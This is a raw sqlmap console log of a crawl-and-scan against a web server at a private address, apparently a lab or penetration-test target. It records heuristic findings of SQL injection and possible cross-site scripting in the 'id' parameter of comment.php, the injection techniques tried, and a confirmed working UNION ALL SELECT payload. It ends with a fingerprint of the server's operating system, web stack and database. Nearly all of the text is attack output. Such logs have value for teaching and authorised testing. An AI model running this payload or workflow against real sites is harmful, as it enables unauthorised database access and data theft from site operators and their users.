        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.9#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:56:43

do you want to check for the existence of site's sitemap(.xml) [y/N] N
[08:56:43] [INFO] starting crawler
[08:56:43] [INFO] searching for links with depth 1
[08:56:43] [INFO] 1/1 links visited (100%)[08:56:43] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)] 1
[08:56:43] [WARNING] running in a single-thread mode. This could take a while
sqlmap got a 302 redirect to 'http://10.11.25.68:80/index.php'. Do you want to follow? [Y/n] Y
[08:56:44] [INFO] 1/13 links visited (8%)[08:56:44] [INFO] 2/13 links visited (15%)[08:56:45] [INFO] 3/13 links visited (23%)[08:56:45] [INFO] 4/13 links visited (31%)[08:56:46] [INFO] 5/13 links visited (38%)[08:56:47] [INFO] 6/13 links visited (46%)[08:56:47] [INFO] 7/13 links visited (54%)[08:56:47] [INFO] 8/13 links visited (62%)[08:56:47] [INFO] 9/13 links visited (69%)[08:56:48] [INFO] 10/13 links visited (77%)[08:56:48] [INFO] 11/13 links visited (85%)[08:56:49] [INFO] 12/13 links visited (92%)[08:56:49] [INFO] 13/13 links visited (100%)[08:56:49] [INFO] searching for links with depth 3
please enter number of threads? [Enter for 1 (current)] 1
[08:56:49] [WARNING] running in a single-thread mode. This could take a while
[08:56:49] [INFO] 1/14 links visited (7%)[08:56:49] [INFO] searching for links with depth 4
please enter number of threads? [Enter for 1 (current)] 1
[08:56:49] [WARNING] running in a single-thread mode. This could take a while
[08:56:49] [INFO] searching for links with depth 5
please enter number of threads? [Enter for 1 (current)] 1
[08:56:49] [WARNING] running in a single-thread mode. This could take a while
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
[08:56:49] [INFO] sqlmap got a total of 10 targets
URL 1:
GET http://10.11.25.68:80/comment.php?id=761
do you want to test this URL? [Y/n/q]
> Y
[08:56:49] [INFO] testing URL 'http://10.11.25.68:80/comment.php?id=761'
[08:56:50] [INFO] using '/root/.sqlmap/output/results-06212018_0856am.csv' as the CSV results file in multiple targets mode
[08:56:50] [INFO] testing connection to the target URL
[08:56:50] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[08:56:50] [INFO] testing if the target URL is stable
[08:56:51] [INFO] target URL is stable
[08:56:51] [INFO] testing if GET parameter 'id' is dynamic
[08:56:51] [WARNING] GET parameter 'id' does not appear to be dynamic
[08:56:51] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:56:51] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks
[08:56:51] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[08:56:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:56:52] [WARNING] reflective value(s) found and filtering out
[08:57:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[08:57:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[08:57:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[08:58:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[08:58:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT)'
[08:58:53] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[08:58:53] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL) (original value)'
[08:58:54] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[08:58:54] [INFO] testing 'Boolean-based blind - Parameter replace (CASE) (original value)'
[08:58:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[08:59:05] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:59:06] [INFO] target URL appears to have 6 columns in query
[08:59:07] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[08:59:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 649 HTTP(s) requests:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=761 UNION ALL SELECT NULL,NULL,CONCAT(0x716a787a71,0x6a4a48786a5361424457496466526771644d45484c486c77766a7a52776847466f536576797a5459,0x7170707071),NULL,NULL,NULL-- LfvW
---
do you want to exploit this SQL injection? [Y/n] Y
[08:59:18] [INFO] testing MySQL
[08:59:18] [INFO] confirming MySQL
[08:59:19] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.0
SQL injection vulnerability has already been detected against '10.11.25.68'. Do you want to skip further tests involving it? [Y/n] Y
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/delete.php?id=761'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/comment.php?id=760'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/delete.php?id=760'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/comment.php?id=759'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/delete.php?id=759'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/comment.php?id=758'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/delete.php?id=758'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/comment.php?id=757'
[08:59:19] [INFO] skipping 'http://10.11.25.68:80/delete.php?id=757'
[08:59:19] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-06212018_0856am.csv'

[*] shutting down at 08:59:19

